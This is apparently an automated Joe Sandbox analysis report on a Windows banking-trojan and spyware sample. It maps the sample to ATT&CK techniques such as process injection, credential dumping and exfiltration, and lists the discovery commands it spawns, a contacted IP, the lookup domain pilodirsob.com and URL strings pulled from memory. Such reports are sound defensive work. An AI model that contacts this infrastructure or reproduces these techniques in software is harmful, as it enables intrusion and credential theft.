Play interactive tour

Edit tour

Analysis Report rb5iJg6pgN.exe

Overview

General Information

Joe Sandbox Version:	26.0.0
Analysis ID:	897192
Start date:	27.06.2019
Start time:	14:38:07
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 22m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	rb5iJg6pgN.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.evad.winEXE@47/15@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 72 Number of non-executed functions: 298
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample does not show any behavior and checks for the installed Java version. Likely requires a different JRE version.

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Windows Management Instrumentation211	Hooking3	Hooking3	Software Packing1	Credential Dumping3	System Time Discovery1	Application Deployment Software	Data from Local System41	Data Encrypted12	Commonly Used Port1
Replication Through Removable Media	Execution through API1	Port Monitors	Process Injection811	Deobfuscate/Decode Files or Information1	Credentials in Files1	Security Software Discovery361	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol22
Drive-by Compromise	Command-Line Interface1	Accessibility Features	Path Interception	File Deletion1	Hooking3	File and Directory Discovery13	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol2
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information2	Credentials in Files	System Information Discovery266	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol2
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Rootkit3	Account Manipulation	Query Registry1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	Modify Registry1	Brute Force	Process Discovery4	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Scripting	Path Interception	Scheduled Task	Process Injection811	Two-Factor Authentication Interception	Application Window Discovery1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port
Supply Chain Compromise	Third-party Software	Logon Scripts	Process Injection	Indicator Blocking	Bash History	Remote System Discovery11	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol
Trusted Relationship	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection	Input Prompt	System Network Configuration Discovery2	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for sample

Show sources

Source: rb5iJg6pgN.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 0.0.rb5iJg6pgN.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 0.1.rb5iJg6pgN.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 0.2.rb5iJg6pgN.exe.400000.1.unpack	Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_004060FB __EH_prolog,MessageBoxA,MessageBoxA,_memset,CreateAcceleratorTableA,wsprintfA,MessageBoxA,SendMessageA,TranslateAcceleratorA,TranslateMessage,_memset,SetAbortProc,GetCursorPos,CreateEventA,SetMapMode,SetWindowExtEx,GetCursorPos,SendInput,GetPriorityClass,GlobalAlloc,DialogBoxIndirectParamA,WaitForSingleObject,SendMessageA,SendMessageA,SendMessageA,GetSystemMetrics,_memset,__libm_sse2_asin_precise,__floor_pentium4,GetTextFaceA,__libm_sse2_asin_precise,GetViewportExtEx,#413,PdhCollectQueryData,SetWindowTextA,GetViewportOrgEx,LoadImageA,RedrawWindow,__libm_sse2_log10_precise,__libm_sse2_log10_precise,__libm_sse2_log10_precise,__floor_pentium4,__libm_sse2_asin_precise,CreateDialogParamA,SetDlgItemTextA,_memset,GetOpenFileNameA,_memset,GetClassNameA,GetClassNameA,__floor_pentium4,DescribePixelFormat,_memset,_memset,_strrchr,SetScrollInfo,GetScrollInfo,ScrollWindow,UpdateWindow,GetDialogBaseUnits,VirtualAlloc,ChooseColorA,SendMessageA,SendMessageA,SendMessageA,GetClientRect,MoveWindow,ShowWindow,ShowWin

0_1_004060FB

Spreading:

Performs a network lookup / discovery via net view

Show sources

Source: unknown	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view			Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\explorer.exe	Code function: 2_2_01552003 FindFirstFileA,lstrcpy,GetFileAttributesA,mbstowcs,FindNextFileA,FindClose,	2_2_01552003
Source: C:\Windows\explorer.exe	Code function: 2_2_01560022 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_01560022
Source: C:\Windows\explorer.exe	Code function: 2_2_015568A7 memset,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,	2_2_015568A7
Source: C:\Windows\explorer.exe	Code function: 2_2_01560316 FindFirstFileW,WaitForSingleObject,FindNextFileW,FindClose,	2_2_01560316
Source: C:\Windows\explorer.exe	Code function: 2_2_0156048A FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,FindClose,	2_2_0156048A
Source: C:\Windows\explorer.exe	Code function: 2_2_01541FF9 RtlAllocateHeap,TerminateProcess,CloseHandle,FindFirstFileW,lstrlenW,RtlAllocateHeap,lstrcpyW,lstrcpyW,DeleteFileW,FindNextFileW,FindClose,HeapFree,FindFirstFileW,lstrlenW,RtlAllocateHeap,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,RtlAllocateHeap,lstrcpyW,TerminateProcess,CloseHandle,lstrcpyW,DeleteFileW,HeapFree,HeapFree,	2_2_01541FF9

Contains functionality to query local drives

Show sources

Source: C:\Windows\explorer.exe

Code function: 2_2_0154C557 memset,memset,GetVersionExW,LoadLibraryW,memcmp,OpenFileMappingA,GetLogicalDriveStringsW,VirtualFree,VirtualFree,GetLogicalDriveStringsW,memcmp,OpenFileMappingA,GetLogicalDriveStringsW,VirtualFree,VirtualFree,GetLogicalDriveStringsW,FreeLibrary,

2_2_0154C557

Networking:

Uses nslookup.exe to query domains

Show sources

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1			Jump to behavior

Connects to country known for bullet proof hosters

Show sources

Source: unknown

Network traffic detected: IP: 5.188.60.53 Russian Federation

Found strings which match to known social media urls

Show sources

Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	String found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: explorer.exe	String found in binary or memory: eralbank ofbeneathDespiteCapitalgrounds), and percentit fromclosingcontainInsteadfifteenas well.yahoo.respondfighterobscurereflectorganic= Math.editingonline paddinga wholeonerroryear ofend of barrierwhen itheader home ofresumedrenamedstrong>heatingretainsclou equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: monthlyofficercouncilgainingeven inSummarydate ofloyaltyfitnessand wasemperorsupremeSecond hearingRussianlongestAlbertalateralset of small">.appenddo withfederalbank ofbeneathDespiteCapitalgrounds), and percentit fromclosingcontainInsteadfifteenas well.yahoo.respondfighterobscurereflectorganic= Math.editingonline paddinga wholeonerroryear ofend of barrierwhen itheader home ofresumedrenamedstrong>heatingretainscloudfrway of March 1knowingin partBetweenlessonsclosestvirtuallinks">crossedEND -->famous awardedLicenseHealth fairly wealthyminimalAfricancompetelabel">singingfarmersBrasil)discussreplaceGregoryfont copursuedappearsmake uproundedboth ofblockedsaw theofficescoloursif(docuwhen heenforcepush(fuAugust UTF-8">Fantasyin mostinjuredUsuallyfarmingclosureobject defenceuse of Medical<body> equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: pilodirsob.com

Urls found in memory or binary data

Show sources

Source: explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: http://.css
Source: explorer.exe, explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: http://.jpg
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	String found in binary or memory: http://crl.comodo.n
Source: explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://crl.m
Source: explorer.exe, 00000003.00000000.1511733570.043DF000.00000004.sdmp	String found in binary or memory: http://crl.microsoWBu4om
Source: explorer.exe, 00000003.00000000.1513780152.049B0000.00000004.sdmp	String found in binary or memory: http://crl.microso_
Source: explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: C60A.bin.3.dr	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
